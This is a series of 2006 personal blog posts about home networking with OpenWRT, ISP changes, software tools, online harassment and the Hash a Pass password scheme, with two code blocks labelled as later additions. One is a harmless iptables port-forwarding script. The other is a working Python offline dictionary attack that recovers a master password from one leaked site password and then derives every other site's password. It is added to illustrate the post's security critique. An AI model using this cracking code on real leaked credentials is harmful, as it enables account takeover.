The Great Internet Upgrade, part 2: What the heck is netfilter?!

As I mentioned in my earlier post, I’m running OpenWRT firmware on my Linksys router. This enables the router to do more than just act as a firewall/router, so that it can do things that you’d normally need some pretty expensive kit to run. (e.g. A Linux box dedicated to the task or some pricey Cisco hardware.)

It works great, I’m happy to say. Package management is smooth and easy, and the basics of routing and firewalling are all taken care of. But there are a few snags…

First, the firewall. It is all driven by iptables, the userspace front end to the kernel’s netfilter framework, which means writing some fairly hairy firewall rules by hand. Added to this, I want to use video chat, which requires about sixteen thousand ports to be opened and forwarded in order to work. (Okay, 22 ports, but come ON!)

Then there’s the VPN… Works great, except I can’t make a connection from work. The first PPTP connection goes, but the second one never makes it back to my Mac or PC at work. Dang! Might have to try L2TP/IPsec instead… Ugh.

Lastly, the wireless isn’t as strong as the signal out of my old SBG1000 (which is running an 802.11b network in my DMZ so that the TiVo and Nintendo DS can get online; everything else is 802.11g and WPA-encrypted), so there’s a big dead spot about the size of my dining table, plus the basement is now entirely devoid of wifi. So I’ve picked up a second WRT54GL which will run OpenWRT and form a Wireless Distribution System (WDS) link so that I get wifi everywhere.

Yes, I now have the world’s most complicated home network. Kind of fun, from a geeking perspective, but from a usability perspective, I have far more equipment and far less expertise in running it! Such is the price of progress…

If anyone out there can show me how to set up my iptables script so that iChat AV works, I’ll Paypal you $5. No kidding. Lend a fella a hand!
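A starting point for the kind of script this post is asking for, added here and not the post’s own firewall script or anything shipped by OpenWRT: a small POSIX shell script that DNATs a list of TCP/UDP ports (single ports or ranges) from the WAN to one LAN host and lets them through the FORWARD chain. It assumes the OpenWRT of that era, where /etc/firewall.user adds rules to the prerouting_rule and forwarding_rule chains, a WAN interface named vlan1 and a video-chat machine at 192.168.1.10. The port list is a placeholder to show the mechanics, not the set iChat AV actually needs; that list still has to come from Apple’s documentation.

```sh
#!/bin/sh
# Added example, not the post's own script: forward a fixed set of TCP/UDP
# ports from the WAN to one LAN host on an OpenWRT (White Russian era) WRT54GL,
# where /etc/firewall.user hooks the prerouting_rule and forwarding_rule chains.
# Interface name, LAN address and the port list are placeholders (assumptions).
#
#   sh fw-forward.sh            # dry run: print the iptables commands
#   DRY_RUN=0 sh fw-forward.sh  # apply them on the router

WAN_IF="${WAN_IF:-vlan1}"                 # assumed WAN interface on a WRT54GL
LAN_HOST="${LAN_HOST:-192.168.1.10}"      # assumed address of the video-chat machine
DRY_RUN="${DRY_RUN:-1}"

# One entry per "proto:port" or "proto:first-last". Placeholder values only;
# replace with the vendor's documented list for the application.
PORTS="udp:5060 tcp:5190 udp:5190 udp:16384-16403"

# Run iptables, or just echo the command when DRY_RUN=1.
ipt() {
    if [ "$DRY_RUN" = 1 ]; then
        echo "iptables $*"
    else
        iptables "$@"
    fi
}

# DNAT one spec to LAN_HOST on the way in, then let it through FORWARD.
# Note the two syntaxes: --dport takes first:last, DNAT takes ip:first-last.
forward_port() {
    proto="${1%%:*}"
    range="${1#*:}"
    dport="$(printf '%s' "$range" | tr '-' ':')"
    ipt -t nat -A prerouting_rule -i "$WAN_IF" -p "$proto" --dport "$dport" \
        -j DNAT --to-destination "$LAN_HOST:$range"
    ipt -A forwarding_rule -i "$WAN_IF" -p "$proto" -d "$LAN_HOST" --dport "$dport" \
        -j ACCEPT
}

apply_rules() {
    for spec in $PORTS; do
        forward_port "$spec"
    done
}

apply_rules
```

Run it once in dry-run mode and read the generated rules before applying them; the forwarding_rule entries are deliberately restricted to the WAN interface, the protocol, the destination host and the port range, so nothing else on the LAN becomes reachable by accident.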

Written on July 12, 2006

Downgrade for speed!

This just in: A Mac IIci is faster than a 3 GHz P4 Windows box!

Low End Mac compared the performance of a brand new 3 GHz Windows box to an old Mac running System 6. While the comparison was limited strictly to word processing and boot-up times, an upgraded Mac IIci blows the doors off the Windows box.

Of course, without restricting yourself to System 6, you can get considerable performance improvements just by using snappier applications. I’m a huge fan of all of Mariner’s products, and find MarinerWrite can open and edit large documents with speeds that put Word to shame.

Or just write in your favorite text editor and paste into Word for your final formatting. (Which also avoids frustration as Word tries to “help” you by reformatting your document every time you delete a line.)

Written on July 7, 2006

Simple hosted bug tracking with 16 Bugs

Bug tracking is a pain, but is very necessary for any size of development project. There are good bug trackers and bad ones, and there are folks who have turned bug tracking into an art form.

What there isn’t is simple bug tracking that any schmuck can set up. Well, actually there is, it’s called 16 Bugs.

Following in the “less is more” ideal popularized by 37 Signals, 16 Bugs provides a simple view of bugs, simple bug entry, and simple integration of users.

Me, I’m using it for my crappy software. Never really had bug tracking before…

Written on July 6, 2006

The Great Internet Upgrade, part 1: Adieu, Comcast

I’ve been a loyal Comcast cable internet customer since they first came to my town (some time around ‘99, I think). During that time, I’ve endured a few rate hikes, and have generally been pleased with the improvements to service (especially once AT&T sold out to Comcast and I suddenly had an internet connection that was up more often than down).

Unfortunately, I now live in a new neighborhood, populated with young folks like me and my wife. These people like their internet connections, and they either are major bittorrent users or their kids are gobbling up bandwidth on MySpace. End result: My actual connection to the internet is about 1.5 Mbit/s, when I’m paying for a supposed 6 Mbit/s connection!

So, I finally got fed up. Qwest sent me a timely offer for a 5 Mbit/s ADSL connection for only $26/month, and I grabbed it. If nothing else, DSL guarantees a speedy pipe to your door.

The initial install failed, so I got a tech out. Unlike the typical Comcast grunt who spends half his time on the cell phone with trained folks, the Qwest fellow had a variety of tools and clearly knew his stuff. After checking the obvious failure points (turn it off and on again, double check modem settings, make sure everything’s plugged in), he proceeded down the street to check the main trunk into the neighborhood. Turns out the initial phone wiring was a bit off, so he spent a good two hours out there re-wiring everything! I was impressed.

I was more impressed when I actually tried my DSL connection. Instead of the 5 Mbit/s I paid for, I got a screamin’ fast 7 Mbit/s connection (which translates to about 5.9 Mbit/s in real-world use – not too shabby)! Upstream is about 730 kbit/s, real-world, which is a fair sight better than the ~300 kbit/s I’d get from Comcast.

The modem/router Qwest gave me (an Actiontec 701) is actually pretty good, but I’m still hooking it up to a Linksys WRT54GL running OpenWRT firmware. (More on OpenWRT in a later post – I’m still learning my way around.) Things are working quite well indeed.

For a cost-saving upgrade, I really couldn’t be more pleased. Qwest’s service was excellent (despite my dread, having dealt for too long with the USWest/Qwest monopoly – perhaps they’ve improved matters since I last had trouble with a Qwest product), and the internet is still up after 24 hours. Too early to count chickens, but it’s going well for now.

Written on July 6, 2006

Girls don't exist on the internet

>My adventures on the internet have led me to learn many things about myself. I’m not a girl and I do not exist on the internet. I do not play games and do not know how to turn on my computer. I did not build my own PC, nor did I buy a video game. I do not own a headset and do not play first person shooters and MMOGs. My life on the internet is an intricate, well planned lie.

From The Escapist: OMG Girlz Don’t Exist on teh Intarweb!!!!1

It really surprises me that as the internet has become massively popular, it is still a surprise for young boys to find a girl online. That a girl would even be afraid to talk in online chats, for fear of being harassed, is doubly shocking.

Perhaps this is more representative of the rarefied world of online role playing games (a nerdier crowd can only be found sitting around a dining room table playing pen and paper Dungeons and Dragons), but please, why doesn’t somebody teach these boys some manners?

Certainly, I have been surprised at times to see girls or women online enjoying the same ludicrous games I enjoy. I had a good online chum back in high school who helped me carve out an empire in Trade Wars, and co-hosted a MUSH (kind of like Second Life without the pictures) with one woman and a gender-bent Filipino boy who desperately wanted to be a young anime superhero girl.

But despite a person’s plumbing or sexual preferences, I never once harassed these women for their pictures, demanded proof, or insisted they weren’t what they were. (Even the Filipino MUSH host went unmasked for quite a while until his/her general weirdness inspired me to seek out his/her web page to see what this wingnut was all about – the web page where I ultimately found his/her picture.)

But really, folks, teach your boys some manners. Online or off, that’s no way to treat a lady. Nor is it any way to treat a cross-dresser.

Written on June 28, 2006

Hash a Pass: No panacea

Hash a Pass was recently featured on Digg.com and is an interesting idea. Using a master password and a JavaScript implementation of the SHA-1 hash algorithm, you can generate a strong, unguessable password for each site, and then simply regenerate it whenever you need it again.

A nifty trick, to be sure, but does this really make you safer?

Here’s an example of how it works: I set my master password to my super-secure 133t password of ‘p@22w04d’. Then I generate a password for, say, Apple.com. So I type in “apple” as the parameter and it generates the wonderful password of ‘EZbqNhEK’, which is really a pretty strong password.

When I then go back to Apple, I can go back to hashapass, and enter the same two keys, and get the same password. End result: Lots of cryptographically strong passwords which I don’t have to remember! All I need is my master password!

Here’s the question, what does this protect me against?

Anyone using the same algorithm can re-create any of my passwords by entering the same two keys. The key for each site/password I want to maintain will necessarily have to be easy to remember (such as the site’s domain name or title), so it is effectively public; the master password is the only real secret. If someone can guess that, it will be trivially easy to get at anything I’ve registered for. Worse, the guessing can be done offline: the moment one site leaks a derived password, an attacker holds the algorithm, the site key and the output, and can run a dictionary attack against the master password at the speed of SHA-1 without ever touching a login form.

What it does protect against is the possibility that one site’s passwords will be leaked/cracked/stolen, and that my password which I use there (and everywhere else) will be tried on a dozen other sites, giving the thieves access to everything.

It’s not a huge benefit over storing or memorizing passwords, as I still need to remember which sites I’ve used hashapass for, and what key I used for each site. (Again, the domain name becomes the most likely input.) This is roughly analogous to having all your passwords stored in an encrypted file/database with a single “master password” to unlock all of them.

Is it better than using the same password on every site? Undoubtedly yes. But it’s hardly 007-grade security. Indeed, it’s probably safer to use a product like Web Confidential to keep a variety of passwords and just look them up when you need them. Yes, someone gaining the file and the master key will have the keys to your kingdom. But with hashapass, they only need the master key; the “database” is right there online.
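The weakness described above, as an added example that is not part of the original post and not Hash a Pass’s own code: a Python model of a hashapass-style derivation, followed by the offline attack an adversary can run once a single derived password leaks. The derivation is an assumed scheme (HMAC-SHA1 of the site key under the master password, base64, first eight characters), so the password it produces for the post’s ‘p@22w04d’/‘apple’ pair need not match the ‘EZbqNhEK’ quoted there. The dictionary is a constructed “leet” mangling rule over a few base words, which is exactly the kind of rule a cracker applies by default.

```python
"""Added example (not from the post or from Hash a Pass): a master-password
hash scheme is only as strong as the master, and one leaked output lets an
attacker test master-password guesses offline."""
import base64
import hashlib
import hmac
import itertools
from typing import Dict, Iterable, Optional, Tuple


def derive(master: str, site_key: str, length: int = 8) -> str:
    """Assumed hashapass-style scheme (illustration, not the site's exact code):
    HMAC-SHA1(key=master, msg=site_key) -> base64 -> first `length` characters."""
    mac = hmac.new(master.encode("utf-8"), site_key.encode("utf-8"), hashlib.sha1).digest()
    return base64.b64encode(mac).decode("ascii")[:length]


# Constructed mangling table: each letter may be left alone or "leet"-substituted.
LEET = {"a": "a@4", "e": "e3", "i": "i1!", "o": "o0", "r": "r4", "s": "s25$", "t": "t7"}


def leet_variants(word: str) -> Iterable[str]:
    """Yield every substitution variant of `word` under LEET
    ('password' -> 'password', 'p@ssword', ..., 'p@22w04d', ...)."""
    choices = [LEET.get(c, c) for c in word]
    for combo in itertools.product(*choices):
        yield "".join(combo)


def recover_master(site_key: str, leaked_password: str,
                   candidates: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack. The algorithm and the site key are public, so
    each guess costs one HMAC-SHA1 and no site ever sees a failed login."""
    for cand in candidates:
        if derive(cand, site_key) == leaked_password:
            return cand
    return None


def attack(site_key: str, leaked_password: str, base_words: Iterable[str],
           other_sites: Iterable[str]) -> Tuple[Optional[str], Dict[str, str]]:
    """Recover the master from one leaked site password, then derive every
    other site's password from it. Returns (master, {site: password})."""
    candidates = itertools.chain.from_iterable(leet_variants(w) for w in base_words)
    master = recover_master(site_key, leaked_password, candidates)
    if master is None:
        return None, {}
    return master, {site: derive(master, site) for site in other_sites}


if __name__ == "__main__":
    MASTER = "p@22w04d"                  # the post's example master password
    SITES = ["apple", "amazon", "bank"]  # constructed site keys (domain-name style)
    leaked = derive(MASTER, "apple")     # suppose apple's password store is dumped
    master, everything = attack("apple", leaked, ["password", "letmein", "secret"], SITES)
    print(f"leaked apple password: {leaked}")
    print(f"recovered master:      {master}")
    for site, pw in everything.items():
        print(f"  {site:<7} {pw}")
```

The eight base64 characters the scheme emits carry about 48 bits on their own, but the system’s real entropy is the master password’s: the 192-guess mangling of the single word “password” is enough to recover ‘p@22w04d’, and with it every site’s password, which is the point the post makes about the “database” being right there online.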

Written on June 26, 2006